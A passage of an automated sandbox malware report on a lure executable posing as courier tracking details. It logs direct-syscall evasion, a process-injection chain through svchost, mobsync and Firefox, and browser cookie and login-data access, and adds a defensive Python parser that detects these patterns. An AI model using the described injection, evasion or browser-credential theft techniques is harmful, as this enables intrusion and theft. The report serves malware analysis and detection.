                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B86ACC mov eax, dword ptr fs:[00000030h]3_2_03B86ACC
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B54A35 mov eax, dword ptr fs:[00000030h]3_2_03B54A35
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B54A35 mov eax, dword ptr fs:[00000030h]3_2_03B54A35
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6CA38 mov eax, dword ptr fs:[00000030h]3_2_03B6CA38
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6CA24 mov eax, dword ptr fs:[00000030h]3_2_03B6CA24
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B5EA2E mov eax, dword ptr fs:[00000030h]3_2_03B5EA2E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BBCA11 mov eax, dword ptr fs:[00000030h]3_2_03BBCA11
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BACA72 mov eax, dword ptr fs:[00000030h]3_2_03BACA72
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BACA72 mov eax, dword ptr fs:[00000030h]3_2_03BACA72
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6CA6F mov eax, dword ptr fs:[00000030h]3_2_03B6CA6F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6CA6F mov eax, dword ptr fs:[00000030h]3_2_03B6CA6F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6CA6F mov eax, dword ptr fs:[00000030h]3_2_03B6CA6F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDEA60 mov eax, dword ptr fs:[00000030h]3_2_03BDEA60
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B36A50 mov eax, dword ptr fs:[00000030h]3_2_03B36A50
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B36A50 mov eax, dword ptr fs:[00000030h]3_2_03B36A50
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B36A50 mov eax, dword ptr fs:[00000030h]3_2_03B36A50
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B36A50 mov eax, dword ptr fs:[00000030h]3_2_03B36A50
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B36A50 mov eax, dword ptr fs:[00000030h]3_2_03B36A50
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B36A50 mov eax, dword ptr fs:[00000030h]3_2_03B36A50
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B36A50 mov eax, dword ptr fs:[00000030h]3_2_03B36A50
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B40A5B mov eax, dword ptr fs:[00000030h]3_2_03B40A5B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B40A5B mov eax, dword ptr fs:[00000030h]3_2_03B40A5B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB89B3 mov esi, dword ptr fs:[00000030h]3_2_03BB89B3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB89B3 mov eax, dword ptr fs:[00000030h]3_2_03BB89B3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB89B3 mov eax, dword ptr fs:[00000030h]3_2_03BB89B3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B429A0 mov eax, dword ptr fs:[00000030h]3_2_03B429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B429A0 mov eax, dword ptr fs:[00000030h]3_2_03B429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B429A0 mov eax, dword ptr fs:[00000030h]3_2_03B429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B429A0 mov eax, dword ptr fs:[00000030h]3_2_03B429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B429A0 mov eax, dword ptr fs:[00000030h]3_2_03B429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B429A0 mov eax, dword ptr fs:[00000030h]3_2_03B429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B429A0 mov eax, dword ptr fs:[00000030h]3_2_03B429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B429A0 mov eax, dword ptr fs:[00000030h]3_2_03B429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B429A0 mov eax, dword ptr fs:[00000030h]3_2_03B429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B429A0 mov eax, dword ptr fs:[00000030h]3_2_03B429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B429A0 mov eax, dword ptr fs:[00000030h]3_2_03B429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B429A0 mov eax, dword ptr fs:[00000030h]3_2_03B429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B429A0 mov eax, dword ptr fs:[00000030h]3_2_03B429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B309AD mov eax, dword ptr fs:[00000030h]3_2_03B309AD
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B309AD mov eax, dword ptr fs:[00000030h]3_2_03B309AD
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B629F9 mov eax, dword ptr fs:[00000030h]3_2_03B629F9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B629F9 mov eax, dword ptr fs:[00000030h]3_2_03B629F9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BBE9E0 mov eax, dword ptr fs:[00000030h]3_2_03BBE9E0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]3_2_03B3A9D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]3_2_03B3A9D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]3_2_03B3A9D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]3_2_03B3A9D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]3_2_03B3A9D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]3_2_03B3A9D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B649D0 mov eax, dword ptr fs:[00000030h]3_2_03B649D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BFA9D3 mov eax, dword ptr fs:[00000030h]3_2_03BFA9D3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BC69C0 mov eax, dword ptr fs:[00000030h]3_2_03BC69C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C04940 mov eax, dword ptr fs:[00000030h]3_2_03C04940
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB892A mov eax, dword ptr fs:[00000030h]3_2_03BB892A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BC892B mov eax, dword ptr fs:[00000030h]3_2_03BC892B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BBC912 mov eax, dword ptr fs:[00000030h]3_2_03BBC912
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B28918 mov eax, dword ptr fs:[00000030h]3_2_03B28918
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B28918 mov eax, dword ptr fs:[00000030h]3_2_03B28918
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BAE908 mov eax, dword ptr fs:[00000030h]3_2_03BAE908
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BAE908 mov eax, dword ptr fs:[00000030h]3_2_03BAE908
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BD4978 mov eax, dword ptr fs:[00000030h]3_2_03BD4978
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BD4978 mov eax, dword ptr fs:[00000030h]3_2_03BD4978
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BBC97C mov eax, dword ptr fs:[00000030h]3_2_03BBC97C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B56962 mov eax, dword ptr fs:[00000030h]3_2_03B56962
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B56962 mov eax, dword ptr fs:[00000030h]3_2_03B56962
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B56962 mov eax, dword ptr fs:[00000030h]3_2_03B56962
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B7096E mov eax, dword ptr fs:[00000030h]3_2_03B7096E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B7096E mov edx, dword ptr fs:[00000030h]3_2_03B7096E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B7096E mov eax, dword ptr fs:[00000030h]3_2_03B7096E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB0946 mov eax, dword ptr fs:[00000030h]3_2_03BB0946
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C008C0 mov eax, dword ptr fs:[00000030h]3_2_03C008C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BBC89D mov eax, dword ptr fs:[00000030h]3_2_03BBC89D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B30887 mov eax, dword ptr fs:[00000030h]3_2_03B30887
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]3_2_03B6C8F9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]3_2_03B6C8F9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BFA8E4 mov eax, dword ptr fs:[00000030h]3_2_03BFA8E4
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B5E8C0 mov eax, dword ptr fs:[00000030h]3_2_03B5E8C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B52835 mov eax, dword ptr fs:[00000030h]3_2_03B52835
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B52835 mov eax, dword ptr fs:[00000030h]3_2_03B52835
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B52835 mov eax, dword ptr fs:[00000030h]3_2_03B52835
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B52835 mov ecx, dword ptr fs:[00000030h]3_2_03B52835
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B52835 mov eax, dword ptr fs:[00000030h]3_2_03B52835
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B52835 mov eax, dword ptr fs:[00000030h]3_2_03B52835
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F180A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_00F180A9
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EEA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00EEA155
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EEA124 SetUnhandledExceptionFilter,0_2_00EEA124
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001EA124 SetUnhandledExceptionFilter,2_2_001EA124
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001EA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_001EA155

                    HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exe | Direct syscalls (one line per reported call):
    NtResumeThread: Direct from: 0x773836AC
    NtMapViewOfSection: Direct from: 0x77382D1C
    NtWriteVirtualMemory: Direct from: 0x77382E3C
    NtProtectVirtualMemory: Direct from: 0x77382F9C
    NtSetInformationThread: Direct from: 0x773763F9
    NtCreateMutant: Direct from: 0x773835CC
    NtNotifyChangeKey: Direct from: 0x77383C2C
    NtSetInformationProcess: Direct from: 0x77382C5C
    NtCreateUserProcess: Direct from: 0x7738371C
    NtQueryInformationProcess: Direct from: 0x77382C26
    NtResumeThread: Direct from: 0x77382FBC
    NtWriteVirtualMemory: Direct from: 0x7738490C
    NtAllocateVirtualMemory: Direct from: 0x77383C9C
    NtReadFile: Direct from: 0x77382ADC
    NtAllocateVirtualMemory: Direct from: 0x77382BFC
    NtDelayExecution: Direct from: 0x77382DDC
    NtQuerySystemInformation: Direct from: 0x77382DFC
    NtOpenSection: Direct from: 0x77382E0C
    NtQueryVolumeInformationFile: Direct from: 0x77382F2C
    NtQuerySystemInformation: Direct from: 0x773848CC
    NtCreateKey: Direct from: 0x77382C6C
    NtReadVirtualMemory: Direct from: 0x77382E8C
    NtClose: Direct from: 0x77382B6C
    NtAllocateVirtualMemory: Direct from: 0x773848EC
    NtQueryAttributesFile: Direct from: 0x77382E6C
    NtSetInformationThread: Direct from: 0x77382B4C
    NtTerminateThread: Direct from: 0x77382FCC
    NtQueryInformationToken: Direct from: 0x77382CAC
    NtOpenKeyEx: Direct from: 0x77382B9C
    NtAllocateVirtualMemory: Direct from: 0x77382BEC
    NtDeviceIoControlFile: Direct from: 0x77382AEC
    NtCreateFile: Direct from: 0x77382FEC
    NtOpenFile: Direct from: 0x77382DCC
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\mobsync.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: NULL target: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exe protection: read write
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: NULL target: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\mobsync.exe | Thread register set: target process: 6336
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 3010008
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 887008
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_00F187B1 LogonUserW,0_2_00F187B1
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_00EC3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00EC3B3A
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_00EC48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00EC48D7
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_00F24C7F mouse_event,0_2_00F24C7F
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe "C:\Users\user\AppData\Local\hurtling\jailkeeper.exe"
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\hurtling\jailkeeper.exe"
Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exe | Process created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"
Source: C:\Windows\SysWOW64\mobsync.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_00F17CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00F17CAF
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_00F1874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00F1874B
Source: TNT AWB TRACKING DETAILS.exe, jailkeeper.exe.0.dr | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: bRQIkEscRm.exe, 00000009.00000002.3370733347.0000000001560000.00000002.00000001.00040000.00000000.sdmp, bRQIkEscRm.exe, 00000009.00000000.2584692196.0000000001561000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: IProgram Manager
Source: TNT AWB TRACKING DETAILS.exe, jailkeeper.exe, bRQIkEscRm.exe, 00000009.00000002.3370733347.0000000001560000.00000002.00000001.00040000.00000000.sdmp, bRQIkEscRm.exe, 00000009.00000000.2584692196.0000000001561000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: bRQIkEscRm.exe, 00000009.00000002.3370733347.0000000001560000.00000002.00000001.00040000.00000000.sdmp, bRQIkEscRm.exe, 00000009.00000000.2584692196.0000000001561000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: bRQIkEscRm.exe, 00000009.00000002.3370733347.0000000001560000.00000002.00000001.00040000.00000000.sdmp, bRQIkEscRm.exe, 00000009.00000000.2584692196.0000000001561000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_00EE862B cpuid 0_2_00EE862B
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_00EF4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00EF4E87
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_00F01E06 GetUserNameW,0_2_00F01E06
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_00EF3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00EF3F3A
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_00EC49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00EC49A0
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
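Added triage example, not part of the Joe Sandbox report: a small parser over the findings above that turns the direct-syscall, "Section loaded ... target" and "Process created" lines into three answers an analyst actually wants: whether the direct syscalls issued by bRQIkEscRm.exe cover every stage of a remote-injection primitive chain (allocate, write, make executable, run), the injection chain from process to process with RWX mappings marked, and which launched process carries a command line naming a different image (svchost.exe started with the sample's own command line). The input is a verbatim subset of the report lines; the stage table and the regexes are mine.

```python
"""Triage the HIPS / OS Protection Evasion findings of a Joe Sandbox report.

Added example, not Joe Sandbox code. The report fuses the source path and the
finding text ("...exeNtResumeThread: ..."); the regexes allow for that.
"""
import ntpath
import re
from collections import defaultdict

# Constructed input: a subset of this report's findings, reproduced verbatim.
REPORT_LINES = r"""
Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeNtMapViewOfSection: Direct from: 0x77382D1C
Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeNtWriteVirtualMemory: Direct from: 0x77382E3C
Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeNtProtectVirtualMemory: Direct from: 0x77382F9C
Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeNtAllocateVirtualMemory: Direct from: 0x77383C9C
Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeNtResumeThread: Direct from: 0x773836AC
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\mobsync.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe "C:\Users\user\AppData\Local\hurtling\jailkeeper.exe"
Source: C:\Windows\SysWOW64\mobsync.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
"""

SRC = r"^Source: (?P<src>.+?\.exe)"
PATTERNS = {
    "syscall": re.compile(SRC + r"(?P<call>Nt\w+): Direct from: (?P<addr>0x[0-9A-Fa-f]+)$"),
    "map": re.compile(SRC + r"Section loaded: NULL target: (?P<dst>.+?\.exe) protection: (?P<prot>.+)$"),
    "create": re.compile(SRC + r'Process created: (?P<dst>.+?\.exe) "(?P<cmd>.+)"$'),
}

# What remote code injection needs; any one call per stage satisfies that stage.
INJECTION_STAGES = {
    "allocate": {"NtAllocateVirtualMemory", "NtMapViewOfSection"},
    "write": {"NtWriteVirtualMemory", "NtMapViewOfSection"},
    "make_executable": {"NtProtectVirtualMemory", "NtMapViewOfSection"},
    "run": {"NtResumeThread", "NtCreateThreadEx", "NtSetContextThread", "NtQueueApcThread"},
}


def parse(text):
    """Group report lines by finding kind; lines matching no pattern are ignored."""
    found = defaultdict(list)
    for line in text.strip().splitlines():
        for kind, rx in PATTERNS.items():
            m = rx.match(line.strip())
            if m:
                found[kind].append(m.groupdict())
                break
    return found


def direct_syscalls_by_process(found):
    """{image name: sorted NtXxx names that image issued as direct syscalls}"""
    calls = defaultdict(set)
    for s in found["syscall"]:
        calls[ntpath.basename(s["src"])].add(s["call"])
    return {image: sorted(names) for image, names in calls.items()}


def has_injection_primitives(calls):
    """True when allocate, write, make-executable and run are all covered."""
    present = set(calls)
    return all(stage & present for stage in INJECTION_STAGES.values())


def injection_chain(found):
    """Ordered (source, target, rwx) edges from 'Section loaded ... target' findings;
    rwx is True if any mapping between the pair was execute+read+write."""
    edges = {}
    for m in found["map"]:
        key = (ntpath.basename(m["src"]), ntpath.basename(m["dst"]))
        edges[key] = edges.get(key, False) or ("execute" in m["prot"])
    return [(src, dst, rwx) for (src, dst), rwx in edges.items()]


def masqueraded_launches(found):
    """Started processes whose command line names a different image than the one
    executed: the report shows svchost.exe launched with the sample's command line."""
    hits = []
    for p in found["create"]:
        image = ntpath.basename(p["dst"]).lower()
        claimed = ntpath.basename(p["cmd"]).lower()
        if image != claimed:
            hits.append((image, p["cmd"]))
    return hits


if __name__ == "__main__":
    found = parse(REPORT_LINES)
    for image, calls in direct_syscalls_by_process(found).items():
        print(image, len(calls), "direct syscalls, full injection set:", has_injection_primitives(calls))
    for src, dst, rwx in injection_chain(found):
        print(f"  {src} -> {dst} {'[RWX]' if rwx else '[RW]'}")
    for image, cmd in masqueraded_launches(found):
        print(f"  masquerade: {image} started as {cmd!r}")
```

The "Direct from" addresses are kept only as parsed fields; the check that matters is the combination: a non-browser process issuing the four primitive stages as direct syscalls, then appearing as the source of an RWX section in a Windows binary. Either half alone has benign explanations (EDR agents map RWX sections; some packers issue a few direct syscalls), the pair does not.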

                    Stealing of Sensitive Information

Source: Yara match | File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000002.3370359960.0000000003570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.3370703283.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2674996160.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3369010830.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3371766946.0000000004A60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2680764092.0000000006000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2686142507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.3366041781.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2667870776.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
